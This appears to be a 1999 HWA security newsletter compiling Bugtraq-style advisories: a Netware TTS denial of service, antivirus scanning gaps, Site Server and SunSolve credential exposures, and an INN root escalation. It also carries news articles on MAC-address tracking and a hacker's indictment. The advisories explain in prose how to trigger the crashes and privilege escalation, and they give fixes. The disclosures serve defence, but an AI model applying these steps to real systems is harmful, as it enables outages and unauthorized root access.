main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Novell Netware buffer overflow in TTS (Transaction Tracking System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 12 May 1999 14:18:59 -0500
From: Simple Nomad <thegnome@NMRC.ORG>
To: BUGTRAQ@netspace.org
Subject: DoS with Netware 4.x's TTS
_______________________________________________________________________________
Nomad Mobile Research Centre
A D V I S O R Y
www.nmrc.org
Simple Nomad [thegnome@nmrc.org]
12May1998
_______________________________________________________________________________
Platform : Netware 4.x
Application : NDS
Severity : High
Synopsis
--------
It is possible to overflow the Transaction Tracking System (TTS) built into
Novell Netware and possibly crash multiple servers.
Tested configuration
--------------------
The testing was done with the following configuration:
Netware 4.11, Service Pack 5B
Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space.
Bug(s) report
-------------
The Transaction Tracking System (TTS) is used by Novell Netware to help
preserve the integrity of data during a system crash. If a transaction is in
the process of being written to the hard drive when the system crashes, upon
reboot the partial transaction is backed out preserving the integrity of the
original data. Administrators can optionally flag a file with the TTS flag
to add this protection (typically done with databases, especially those that
have no rollback features).
TTS by default tracks 10,000 transactions, and each instance uses a small
amount of memory. If a burst of transactions are sent to the server and the
available memory is exhausted, TTS will disable. While TTS is disabled, no
updates can be made to Netware Directory Services. This can impact any program
or process that updates NDS, such as login. In extreme overrun cases, such as
very large simultaneous (or near simultaneous, actually) transactions, memory
will be depleted quick enough to crash the server.
This is not entirely uncommon, as any large burst of traffic updating NDS
will cause the problem, such as bringing up a server after several days of
downtime that has a Directory Services replica on it. Normally this can be
corrected by increasing RAM or lowering the amount of transactions tracked
>from the maximum default of 10,000 down to say 5,000 by issuing the command
SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling
TTS by typing ENABLE TTS at the console.
However, a malicious user with proper access can force the memory depletion
and potentially crash a server that has a replica of the NDS database. This
can lead to multiple near-simultaneous server crashes.
Of course anyone with administrative access can do this, but they could
obviously do other acts that could be just as destructive, if not more so.
What is needed is the ability to create a large number of NDS updates very
quickly. For example, if a user has the ability to create a container and
add objects to it, them that user has enough authority to potentially cause
problems to TTS. Creating a container, dropping a few hundred objects into the
container via drag-and-drop and then deleting the container should suffice.
If the server lacks a large amount of free memory, the server will quite
possibly abend. In other cases, TTS is disabled, which is a form of Denial of
Service. As the messages are sent across to other servers containing NDS
replicas, they too may crash. In our test environment we were able to crash
two servers (Netware 4.1 and Netware 4.11) with a the scenario of creating a
container, adding a few hundred users, and then deleting the container.
Solution/Workaround
-------------------
NMRC has heard reports of as many as a dozen servers crashing within a couple
of minutes of each other, so apply the latest Service Pack for Netware 4.x on
all servers or upgrade to Netware 5.
Comments
--------
Novell has already been notified and they are obviously aware of the TTS
limitations (refer to the May 1997 TID 2908153 at
http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example).
Per Novell the latest patches for Netware 4.x correct the problem, and Netware
5 does not have the problem at all.
Thanks to Michel Labelle <divebc@hotmail.com> for notifying NMRC about this
problem.
_______________________________________________________________________________
See http://www.nmrc.org/news/ for more advisories.
Simple Nomad //
thegnome@nmrc.org // ....no rest for the Wicca'd....
www.nmrc.org //
@HWA
04.0 InoculateIT for Windows NT 4.53 scans inbox but misses other inbound msgs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 12 May 1999 09:52:59 -0500
From: Bob Duffett <Bob.Duffett@CCC.UAB.EDU>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: InoculateIT 4.53 Real-Time Exchange Scanner Flawed
Manufacturer: Computer Associates
Product: InoculateIT for Windows NT v4.53 Build 169, Agent for
Microsoft Exchange
This product has a major defect.
We have it running on our Exchange Server
with 1,300 mailboxes yet viruses keep spreading directly from email. I
did some investigating tonight and found the problem.
It is ONLY scanning the Inbox folder tree. This would sound simply like
a poor design but it is MUCH worse.
The Inbox Rules Wizard can store the user's rules on the Exchange Server
which will move a message to a specific folder without the message ever
being placed in a user's inbox. This causes it to comletely by-pass the
InoculateIT Real-Time Scanner.
My CA rep confirmed the problem with CA support who had no work-around
available at this time.
Bob
University of Alabama at Birmingham
Cancer Center Technical Services Facility (CCTSF)
mailto:Bob.Duffett@ccc.uab.edu
@HWA
04.1 CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sat, 8 May 1999 14:58:08 +1000
From: Glenn Corbett <Glenn.Corbett@bigpond.com>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Insecure Bahaviour in Inoculan Client
Russ,
A problem has been discovered with the InocuLAN client on Windows NT
workstations. If an account lockout policy is present on a Windows NT
domain, large numbers of repeating account lockouts can occur.
Description: Incorrect password events (event id 529) are being logged from
workstations when running applications from UNC paths. The username that
has logged the incorrect password is different to that of the logged on
user.
Configuration: Windows NT workstation SP3 or SP4, with InocuLAN V4.0(373) or
InocuLAN V4.0(375)
To reproduce the problem:
1. Install InocuLAN V4.0(373) or V4.0(375) onto an NT workstation with
SP3 or SP4 (SP5 not tested yet)
2. Configure InocuLAN as described below:
Options:
Direction - Incoming and Outgoing files
Action upon Virus detection - Cure File
Cure Action for Macro Viruses - Remove Infected Macros
Copy File before Cure
Rename File when Cure Fails
Rename Extension - AVB
Move Directory - C:\Inoculan\VIRUS
Protected Areas:
Protect Floppy Drives
Protect Network Drives
Protect CD-ROM Drives
Scan Type - Secure Scan
3. Reboot the workstation
4. Log into WorkstationA as Domain UserA, Logout Domain UserA
5. From another workstation change the password of Domain UserA
6. Log into WorkstationA as Domain UserB.
7. From WorkstationA run an application from a remote share on WorkstationX
where Logon and Logoff, Success/Failure, are being audited. Run an
application from the cmd window using a UNC path with no other connections
to the WorkstationX. Eg \\WorkstationX\shareX\notepad
8. The application will take several seconds to run and there will be a
failure security event (529) for UserA from Workstation A. From server
manager remotely stop the Cheyenne InocuLAN Anti-Virus Server on Workstation
A and repeat step 7. You will see that the application will start
immediately and no errors will be recorded in the security event log.
The above problem also causes problems when running logon scripts. If an
application is called from the logon script and that application does not
exit on the local workstation, the version in the logon share will be run.
As soon as the application in the logon script is called there is an event
529 error recorded on the logon server security event log.
Even if subsequent different users log into Workstation A, these problem
will continue until the workstation is rebooted.
This behaviour can also been seen if in Step 4, a local userA logs on. The
subsequent error 529's have the local userA account in the security event.
It appears as though InocuLAN is storing the user credentials for the first
logged on user and using them to scan network drives for virus' even when a
different user subsequently logs on until workstation reboot. It is not yet
apparent if this username / password is being stored in the registry /
temporary file or memory, and therefore open to exploit.
We do not see this problem with InocuLAN V4.0 (4.0 Service Pack 1).
CA Have been notified earlier this week, no respose as yet.
Thanks
Glenn Corbett
CRISP Project Server / Workstation Team Leader
Compaq Computer Corp, Australia.
Glenn.Corbett@compaq.com (Work)
Glenn.Corbett@bigpond.com (Private)
--------------------------------------------------------------------------------
Date: Fri, 14 May 1999 14:49:17 -0400
From: ARCNT <ARCNT@CAI.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: NTBUGTRAQ response - URGENT
The issue reported to NTBUGTRAQ regarding InocuLAN v4.0 build 373 and 375
implies that username/password information is stored "somewhere" on the
client
side and as such could potentially be exploited.
That assertion is inaccurate, the username/password credential combination
is NOT stored on the client side by Inoculan, (which is why the efforts to
locate
these credentials in shared memory, in a file or in the registry have been
unsuccessful).
Clearly, in order for the InocuLAN real-time scanner to access files on a
remote server,
the software must have valid security contexts in place to permit the
requisite access
to the file systems and files.
The techniques utilized by Inoculan (using low level, but fully documented
and
supported standard vendor API's) do NOT require that traditional user
credentials (user account/ password) be presented in order to gain the
necessary
access.
Rather, Inoculan is able to gain the required access in a completely
secure manner without prompting for username and password information.
In addition, it is important to point out that NO attempt to retrieve
credential data
is done without the user's explicit advance knowledge and consent.
Computation/generation of the requisite credential information is done at
Inoculan driver
initialization time, and can be easily refreshed by simply rebooting the
machine (which of
course will in turn result in Inoculan initialization routines being
invoked as part of
system restart).
The particular behaviour observed and reported can be attributed to the
fact that AFTER
Inoculan initialization was completed, the user access credentials for the
user in question
were modified, rendering the originally computed credential that Inoculan
would otherwise
utilize, invalid.
An enhancement is being developed presently to provide a configuration
setting that
will instruct the Inoculan real-time scanner to recompute credentials
automatically thus
eliminating the need to reboot the client machine.
This enhancement will be available by 17:00 Eastern US time, May 21, 1999,
and can be
downloaded from the standard Computer Associates support web sites,
(http://support.cai.com).
We appreciate the efforts involved in bringing this issue to our attention
and look forward
to being able to provide you continued responsive service in the future !
InocuLAN Technical Support
@HWA
05.0 [ISN] Everywhere your MAC address shows up
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 11 May 1999 21:55:22 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Everywhere your MAC address shows up
Forwarded From: <anonymous>
MICROSOFT'S HEAVY HAND IN THE COOKIE JAR
A special report from YEOW - Barry Simon.
See the Woody's Office Watch discussion and details on the Office 97
privacy problem. Issues 4.11 and 4.12
Because of the important Internet Explorer 5 coverage some regular WWW
features have been held over to the next issue.
We reported earlier on the brouhaha over the inclusion of hardware IDs in
the Pentium III chip and privacy advocates' concerns about it. Turns out
many of us already have hardware IDs on our systems since all Ethernet
cards have a MAC (stands for 'Media Access Control', whatever that
means!), a six byte ID number that networks need to be sure to properly
direct network packets. Of course, the Pentium III ID's are more serious
since many home systems don't (yet) have network cards and the biggest
privacy concerns are in the consumer space.
Due to wonderful sleuthing by Richard Smith of PharLap (who earlier
located the April Fool's Bug discussed in WWW issue 2.2), the world has
discovered a number of places that Microsoft has been using these MACs -
in Windows 98 IDs, in Office 97 documents and in the microsoft.com
cookies. And privacy concerns result from all these uses.
To understand the issues, try a few experiments. First, you'll need your
MAC assuming you have an Ethernet adapter. With Windows 9x, run the
program winipcfg from the Run box. It should load with a dropdown that
says 'PPP Adapter'. Change the dropdown to the name of your hardware
adapter. The Adapter Address field will say something like
00-70-06-9A-8E-43. That's your MAC. Each byte is presented as two hex
digits (0 through 9 or A-F) for a 12 character ASCII string which is what
Microsoft uses. With Windows NT, run instead winmsd, go to the Network
tab and pick Transports and you'll get the MAC.
For the next experiment, you'll need to look at a Word 97 document in text
mode. You can't do this with Word. If you have Quick View Plus (plain
Quick View won't do), open a Word doc in QVP, go to the View menu and pick
View as Text. Or make a small Word doc, save it and rename it to a .txt
extension and open it in Notepad. Now search for the string PID. You
should find _PID_ GUID and shortly afterwards, a long hex string inside
braces such as {F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}. Those 12 hex digits
at the end will be your MAC. Yup, every Word doc, every Excel spreadsheet
and every Power Point presentation is branded with an identifier showing
the PC it came from. If your boss has a Word memo you sent her and a copy
of the anonymous whistle blowing attachment you sent to the Feds, she
could determine they were made on the same machine. (Of course, if you
aren't careful, the document includes an author name and if any
corrections were made, it may say who made the corrections. Within the
next few days, Microsoft expects to post a white paper on all the
'metadata'; embedded in Office documents).
To run the next experiments, you'll need Windows 98, so I'll tell you what
happens so you can follow along in any event. In your Windows directory,
you'll find a file called reginfo.txt. Open it in Notepad and look for a
line called HWID; it ends with your MAC. This file is created when you
install Windows and is transmitted to Microsoft when you register. And
here's the clincher: even if you check the box not to
send hardware
information, this data is sent. And it's even worse - the data collection
code is in an ActiveX control that can be used by any Internet site out
there. Pharlap has a demo to illustrate this: go there and it displays
your MAC on screen. Any site knowing of this control could track MACs of
all Windows 98 visitors to their sites. There is also a demo and
discussion at Windows Magazine. By the way, this ActiveX control is also
in the Windows 2000 beta so if Microsoft hadn't been found out, NT users
would have been hit next.
Next, go to your cookies directory and open the text file whose name ends
with microsoft.txt (it probably has a username@ in front where username is
your login name). In it you'll find a string called GUID that includes
your MAC (GUID, by the way, is short for Global Unique Identifier). This
cookie is sent to www.microsoft.com every time you visit that site. You
may have realized they were making a cookie when you registered at their
site but I bet you didn't realize they were adding hardware information
without your permission. (Actually the Win98 Registration Wizard made the
cookie before you went to the Microsoft site.)
You might want to search your Registry for your MAC as a string. I found
mine numerous times - two in suspicious places viz a viz Microsoft. It's
part of a key for Media Player called Client ID (is this passed on to the
Media Player servers?) and as part of a key HKCU\Identities that seems to
be connected with Outlook Express 5.0.
There is certainly plenty here for the paranoid. Microsoft is collecting
and storing in its databases unique hardware information. That
information brands your documents, and is always sent on when you access
Microsoft's site. One has to consider the possibility that Microsoft is
keeping some master database tracking all sorts of interactions based on
your MAC. And one has to allow the possibility that the MAC will be
encoded in the information that is sent by the Office Registration Wizard
in Office 2000.
Microsoft has reacted vigorously to the developments in this story. They
have two customer letters ( here and here) on their site in which they
promise to remove the hardware ID part of the registration wizard in a
Win98 upgrade. They also promise to delete 'any hardware ID information
that may have been inadvertently gathered without the customer having
chosen to provide Microsoft with this information.' Tools have already
been posted to remove branding from Office applications and from
already-created docs and there is a promise that branding will be removed
>from the final version of Office 2000.
Beyond these actions, there has been a full court spin operation. Some MS
representatives have (unwisely in my opinion) attempted to minimize the
issue. There have been claims that the doc branding was a part of a
feature, never implement, intended solely to help network administrators.
There has been harping on the fact that the MAC only identifies a machine
but not an individual - true but not of much comfort in many cases. We've
been told that Windows 98 sending a HWID even if you said not to send
hardware information was a bug, not a feature - an inadvertent programming
error. There's been no new statement about the use of MACs in cookies
which I find most disturbing.
We've been told by Microsoft representatives that the Office 2000
Registration Wizard doesn't collect MACs or anything like a MAC. Indeed,
they claim that while the Office CD serial number can be reconstructed
>from the 16 byte code sent by the wizard, the hardware info does not allow
reconstruction. In particular, if the different CDs were used on the same
machine, they'd be unable to tell that the codes came from the same
machine.
_____
The problem with the Microsoft position is that the company has so little
credibility and there is too much of a pattern here. We pride ourselves
on taking a middle road on Microsoft at Woody's newsletters. We don't
hesitate to put their feet to the fire but, on the other hand, we don't
take the position that Microsoft is the root of all evil and everything
they say and do is two faced. That said, Woody's middle name isn't Polly
and mine isn't Anna. Microsoft has amply demonstrated that it is company
policy to, er, shade the truth when doing so serves a perceived business
purpose. We see it in the leaked disinformation about Windows 2000
shipping this fall, we've seen it in their previous reactions to
accusations and we saw it too often in the testimony at the DOJ trial.
That means one has to take skeptically every statement that Microsoft has
made about the MAC problem. I'm inclined to believe that branding of
Office documents wasn't part of a plot to link together our entire lives
in Microsoft's databases. But I'm insulted that they try to bat their
eyelashes and claim to us that the sending of the HWID even when you told
them not to send hardware info was an inadvertent error. And I'm
concerned that we have no way of knowing that they've kept their promise
to remove hardware IDs from their internal databases. Indeed, my
presumption is that they will not.
I worry that Microsoft is tucking all sorts of things into the holes they
aren't discussing. While they have said they'll stop using HWID, they
have also said they'll continue to use the MSID number which is created by
the Windows 98 Registration wizard. And, guess what? As discovered by
Peter Siering at the German publication C'T Magazine, the registration
wizard also creates a Microsoft cookie that includes MSID. So even after
the apologies and changes, it seems Microsoft will be quite capable of
tracking us and linking online visits to registration information.
It's interesting about credibility. There was also an Intel slip reported
recently that they claimed was inadvertent. Apparently some mobile
Pentium II's shipped with hardware IDs even though these were only
announced for Pentium III's. Intel's explanation is that they experimented
with this feature in the manufacturing process for the mobile Pentium II
but it was supposed to be disabled before shipping. One line
inadvertently didn't do the disabling. Intel's credibility is such that
I'm willing to accept their claim of inadvertence here.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
06.0 [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 11 May 1999 16:27:38 -0600
From: Mark <mark@NTSHOP.NET>
To: BUGTRAQ@netspace.org
Subject: [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs
====================================================
Site Server's AdSamples Directory Reveals ID and PSW
Discovered by Andrey Kruchkov
====================================================
VERSIONS EFFECTED
* Tested on Microsoft Site Server 3.0 Commerce Edition
DESCRIPTION
Site Server allows the installation of an AdSamples directory, which serves
to demonstrate the capabilities of the Ad Server component. If this
directory is installed and left open to the public without limiting
directory permissions, a user can obtain a site configuration file
(SITE.CSC) that contains sensitive information pertaining to an SQL
database. This information could contain a DSN, as well as a a username and
password used by the Ad Server to access the SQL server database.
COMMENTS
Andrey reported this problem to NTSECURITY.NET and has informed Microsoft of
this issue.
Andrey points out an easy way to eliminate this risk:
Remove the "AdSamples" virtual directory from the DEFAULT root Web site, or
change security permissions for this folder to sufficiently restrict access.
If you must provide loose access to this virtual directory for some strange
reason, then you should at least adjust the security permissions for the
SITE.CSC file so that it's not available for viewing. Also keep in mind that
there may be numerous other SITE.CSC files under your Site Server
installation, all of which need to be secured.
For a URL that demonstrates the problem, please visit
http://www.ntsecurity.net/scripts/loader.asp?iD=/security/siteserver-2.htm
This is probably a great time to remind people once again to NEVER install
sample content on production servers and to NEVER use the built-in IIS
DEFAULT Web site without first thoroughly investigating the implications of
doing so.
Thanks,
Mark - http://www.ntsecurity.net
@HWA
07.0 inndstart vulnerability, possible root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 11 May 1999 11:24:06 -0400
From: Forrest J. Cavalier III <mibsoft@mibsoftware.com>
Reply-To: userkt-l@mibsoftware.com
To: BUGTRAQ@netspace.org
Subject: INN 2.0 and higher. Root compromise potential
Copyright 1999 Forrest J. Cavalier III, Mib Software
This information is provided by Mib Software, www.mibsoftware.com.
This notice can be distributed without limitation.
Summary:
--------
INN is open source NNTP (Usenet) server software from the Internet
Software Consortium. http://www.isc.org/
In some cases, there is potential for the local news user,
or any local user, to execute arbitrary code as root.
The two vulnerabilities reported below have already been
discussed in the Usenet newsgroup news.software.nntp.
Therefore, the vendor is being sent this notice now, and
was not notified previously.
INN is communications software. Mib Software knows of
no buffer overrun exploits of the affected versions of
INN, but the possibility cannot be ruled out. This would
be the only way a root compromise using a remote connection
would be possible.
Background:
-----------
Since NNTP defines a privileged port (119), a SUID root
wrapper, inndstart, binds to the port, and then is
intended to drop root privileges, setting the UID to user
news before exec() innd. In some cases, this behavior
can be altered to gain privileges.
------------------------------------------------------------
Vulnerability 1 (pathrun should not be trusted information)
------------------------------------------------------------
Summary: It is possible for the news user to control the behavior
of the inndstart program so that root privileges are not
dropped, and execute arbitrary programs as root.
Versions affected: INN 2.0 and higher.
Versions not affected: INN 1.7.2 and lower.
Details: inndstart determines the target UID and GID from
the UID and GID of a directory which is normally owned
by user news, group news. The directory which is checked
can be changed be editing the "pathrun" parameter
in the inn.conf configuration file.
By specifying a directory with appropriate ownership, inndstart
can exec() running as any user, including root.
During the course of normal operation, innd forks() and executes
many child processes, and it is relatively simple to run arbitrary code
from innd.
Solution: modify the source file innd/inndstart.c to use a
hard coded pathrun, instead of the structure member
innconf->pathrun.
Workaround: There is no workaround. The source must be modified.
------------------------------------------------------------------
Vulnerability 2 (inndstart should be protected,
INNCONF environment variable should not be trusted.)
------------------------------------------------------------------
Versions affected: INN 2.x after July 9, 1998 (including INN 2.1
and higher.)
Versions not affected: INN 1.7.2 and lower.
Details: Normally, the SUID root program inndstart, should be
in a directory accessible only by user news. In some
installations, this program is accessible to all local users.
On July 9, 1998 a source code change was introduced which
obtains the path of the configuration file from the environment
variable INNCONF. In those installations with inndstart
accessible to local users, a local user can set INNCONF in the
environment and determine the behavior of inndstart
so that abitrary programs are executed.
If the pathrun vulnerability above is fixed, these programs run as
user news, if not fixed, they run as user root.
Solution: Install inndstart in a directory with 0700 permissions
owned by user news.
-------------------------------------------------------------------
Forrest J. Cavalier III, Mib Software, INN customization and consulting
'Pay-as-you-go' commercial support for INN: Only $64/hour!
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages.
http://www.mibsoftware.com/innsup.htm
@HWA
08.0 Sunsolve.Database leaks crucial info about itself and its users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 11 May 1999 19:22:59 +0100
From: "Robson, Ken" <RobsonK@EBRD.COM>
To: BUGTRAQ@netspace.org
Subject: Sun Microsystems Leaks extensive Amounts of Information About Itself
& It's Customers Through Its Sunsolve Database...
Hi Folks,
I have just been scouring Sun's Bug Reports for some information and I
discovered that you can easily trawl for useful information about both Sun
and its clients. Information exposed includes:-
* Copies of /etc/passwd (i.e. user names)
* Copies of /etc/shadow (i.e. encrypted passwords)
* Configuration of network services (i.e. inetd.conf)
It is trivial to put together searches that glean this for some of their
customers. Whilst the contract services restrictions are in place for
accessing these accounts, logins must be in wide circulation. I know 3 or 4
accounts from various past employers myself.
When logging a support call I do not often consider what might happen to the
call notes. I am sure that Sun are not the only company doing this and this
is not aimed at Sun in particular, they are just an example. Serious
consideration should be given to what information you are prepared to pass
to those who support you - do you trust the rest of their customers (at
best) or the entire internet (at worst).
Anyway not earth shattering but food for thought.
Regards,
Ken.
PS - Please do not interpret the domain that this mail comes from as any
indication that I work for the European Bank for Reconstruction &
Development. I in fact contract to Hewlett Packard and am simply based at
the bank - all the opinions expressed above are my own and have nothing to
do with either of these organisations.
-----------------------------------------------------------------------------
Date: Wed, 12 May 1999 09:56:00 -0700
From: Alan Coopersmith <alanc@GODZILLA.EECS.BERKELEY.EDU>
To: BUGTRAQ@netspace.org
Subject: Re: Sun Microsystems Leaks extensive Amounts of Information About Itself & It's Customers Through Its Sunsolve Database
> When logging a support call I do not often consider what might happen to the
> call notes. I am sure that Sun are not the only company doing this and this
> is not aimed at Sun in particular, they are just an example. Serious
> consideration should be given to what information you are prepared to pass
> to those who support you - do you trust the rest of their customers (at
> best) or the entire internet (at worst).
The actual service order notes are not available to customers through SunSolve
- but parts of bug reports that may be generated by them are. At least a few
years ago when I worked in SunService they reminded us not to put customer
information in the public part of bug reports, but there was no review system
to make sure we didn't screw up. If you want to protect yourself, make sure
that if your call results in a bug report you go to SunSolve and review the
public copy to make sure there's nothing in there you wouldn't want others to
see and if there is, call up your service rep and make them move it to the
sun-internal-access-only section of the bug report.
Disclaimer: I no longer work in Tech Support at Sun and do not and cannot
speak for SunService or whatever they're called after the latest "realignment
of the Sun planets".
--
________________________________________________________________________
Alan Coopersmith alanc@godzilla.EECS.Berkeley.EDU
Univ. of California at Berkeley http://soar.Berkeley.EDU/~alanc/
aka: alanc@{CSUA,OCF,CS,BMRC,EECS,ucsee.eecs,cory.eecs}.Berkeley.EDU
@HWA
09.0 [ISN] Asia is wide open to virus, hacker attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
http://www.feer.com/Restricted/99may_20/tech.html
(Feer.com) [5.20.99] How personal are personal computers? At the rate
Asian companies and individuals are exposing their computers to on-line
infection and intrusion, they may as well drop the "P" from PC. The
information highways are proving very public, but many Asians are
travelling naked and defenceless.
Computer viruses are the region's biggest problem. Two major virus attacks
in March and April crippled hundreds of thousands of Asia's computers.
Then in late April, the Singapore government was caught snooping into PCs
without seeking permission from their owners. The incidents have
highlighted the need to protect PCs from viruses and unwanted
intruders--protection that's sorely lacking in the region.
While multinational companies now keep a constant vigil on the security of
their computer networks, many other companies and individuals have left
themselves vulnerable. To protect against viruses, they need to install
and diligently update antivirus software, which costs an average of $50
per program for personal use. Large companies have for many years
installed virtual "firewalls" that combine antivirus, antihacking and
other protective software, but antihacking and personal-data security
programs are only just becoming commercially available to individual PC
users.
The latest virus hit more than 650,000 computers in Asia. Named Chernobyl,
it remained dormant until April 26, the 13th anniversary of the Chernobyl
nuclear-plant disaster in Ukraine. On that day, the virus disabled
computers, destroyed programs and erased large amounts of stored
information. Xinhua news agency reported that 360,000 PCs were affected in
China. The virus's Taiwanese creator, 24-year-old Chen Ing-hau, said he
had wanted to cause mayhem on the mainland. Chen was arrested but released
without charge due to a lack of plaintiffs in Taiwan, where no infections
were reported.
"Chernobyl's been known about and treatable for over a year and still
people were caught out," says Daniel Schneersohn, Hong Kong-based
regional director for Symantec, an American maker of antivirus software.
He says many customers had such software installed, but had simply not
activated it. Half of the damaged PCs in China, for instance, had
protective software that was not turned on. Although most corporate PCs
shipped to South Korea since 1997 contain antivirus software, Chernobyl
infected an estimated 250,000 PCs in that country. Many companies allow
their employees to turn off antivirus software, which can slow down the
computer while it monitors infections. Many users had failed to keep
installed software up-to-date. "It's not enough to buy antivirus software
and install it or even activate it," says Schneersohn. "You've got to
update the software--the antivirus companies update the virus threat lists
every week."
Eric Sheridan, director of Asia business development for U.S.
computer-systems company Corporate Software & Technology, says most of his
customers, almost all multinationals, escaped Chernobyl unscathed. "Our
customers all have ongoing contracts for security and virus protection, or
they have good in-house teams at work," he explains.
Most at risk are individual PC users and companies with less sophisticated
information-technology departments, Sheridan says, especially as they make
increasing use of the Internet. "Once you have a few offices up and
on-line you have to take outside threats like viruses and hacking
seriously."
Schneersohn agrees that while multinational firms are taking these threats
seriously, the rest of the Asia-Pacific isn't. "Even some big listed
companies in Hong Kong don't use antivirus protection," he says.
Smaller businesses in particular have turned to pirated antivirus programs
during the economic crisis to keep costs down. But they lose the
advantages of software support and advice, says Schneersohn. "It's
software use at its lowest level and that's why the highest level of
infections are in small businesses and homes" where pirated programs are
most prevalent.
Still, even pirated-software users could have protected themselves by
downloading updates of antivirus programs from the manufacturer's Web
site. For now, most software companies don't bother to trace pirates who
download updates, says Schneersohn--although Symantec's next generation of
antivirus software will update only registered users.
Just as the dust settled from the Chernobyl attack, Internet users in
Singapore were faced with a more organized affront to their computer
privacy. SingNet, an Internet service provider, acknowledged that it asked
the Home Affairs Ministry's IT security unit to scan its customers' PCs
for viruses without their consent. SingNet is owned by Singapore Telecom,
which is in turn 80%-owned by the government. SingNet's actions only came
to light because a student, who had downloaded antihacker software from
the Internet onto her PC, traced the scan back to the ministry.
SingNet's home page on the Web apologizes for the intrusion--"We should
have informed you first," it says--and invites visitors to voluntarily
submit to the virus search instead. The company says the scanning did not
"enter" any PCs nor unveil any personal data. Also, SingNet claims it
found 900 PCs infected with "trojan horse" viruses that allow hackers to
enter computers via the Internet and take almost complete control.
The SingNet action and the discovery of the "trojan horse" viruses
highlight the ease with which PCs can be snooped on while on-line. "If
breaking in is so easy, some less scrupulous companies may well start
thinking that it might be worth throwing a few bucks at some kid to look
into their competitors' files," says Schneersohn.
For personal and small-business users, encryption is one option for
protecting confidential data from hackers. But use of encryption is either
illegal or legally untested in many Asian countries. A second option is to
remove confidential data to a separate disk drive and access it only when
the user is off-line.
To protect stored data while the user is on-line, demand will probably
grow among personal and small-business PC owners for simpler versions of
the "firewalls" that large companies use to protect their computer
networks from intrusion.
Schneersohn says antivirus software makers are already looking into the
market. "Many people want to block access to personal files to all third
parties--you could call it a personal firewall. They simply want to regain
control of what's happening on their computers."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
10.0 More on Zyklon's legal troubles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Zyklon Busted
contributed by Space Rogue
HNN first reported this news early Friday morning and has now learned more details. Zyklon,
(Eric Burns) has now been charged with three counts of unlawful computer intrusion. The counts
are believed to be for alleged attacks on the USIA (US Information Agency) web site, which as
hosted by Electric Press in Herndon, Va. Other companies allegedly attacked where LaserNet in
Fairfax, Va.; and Issue Dynamic Inc., which also has machines in VA. The total damage estimates
are listed as $15,000. (Which seem a little low compared to other similar cases) It is believed
that the Secret Service will also question Zyklon in connection to any involvement he may or may
not have had in the recent whitehouse.gov crack.
Copy of the Indictment
http://www.hackernews.com/orig/zyklon.html
MSNBC
http://www.msnbc.com/news/269584.asp
ABC News
http://abcnews.go.com/sections/tech/DailyNews/whitehousehacker990515.html
IN THE UNITED STATES DISTRICT COURT FOR THE
EASTERN DISTRICT OF VIRGINIA
Alexandria Division
UNITED STATES OF AMERICA )
)
v. ) Criminal No.
)
) Counts 1-3: Computer
Intrusion
ERIC BURNS ) (18 U.S.C. $ 1030(a)(5)
also known as "Zyklon" )
)
Defendant. )
INDICTMENT
May 1999 Term - At Alexandria, Virginia
COUNT 1
THE GRAND JURY CHARGES THAT:
From on or about August 25, 1998, through on or about
January 22, 1998, in the Eastern District of Virginia and
elsewhere, ERIC BRUNS, also known as "Zyklon," defendant herein,
knowingly and intentionally cuased transmissions from a computer
in Shoreline, Washington, of progress, information, codes, and
commands, and as a result of such conduct, intentionally caused
damage without authorization to a computer of Electric Press,
Kerndon, Virginia, which was a protected computer used by and for
the United States Information Agency, and agency of the United
States Government, and the conduct affected the use of the
computer by and for the government and caused loss aggregating at
least $5,000 to at least one individual between August 25, 1998
and March 1, 1999.
(In violation of Title 18, United States Code, Section
1030(a)(5)(A).)
COUNT 2
THE GRAND JURY CHARGES THAT:
From on or about December 28, 1998, through on or about
December 31, 1998, in the Eastern District of Virginia and
elsewhere, ERIC BURNS, also know as "Zyklon," the defendant
herein, knowingly and intentionally caused transmissions from a
computer in Shoreline, Washington, of programs, information,
codes, and commands, and as a result of such conduct,
intentionally caused damage without authorization to a computer
of Computer Tech Services, doing business as LaserNet, in
Fairfax, Virginia, which was a protected computer used in interstate
commerce and communication, and caused loss
aggragating at least $5,000 to at least one individual between
December 28, 1998, and March 1, 1999.
(In violation of Title 18, United States Code, Section
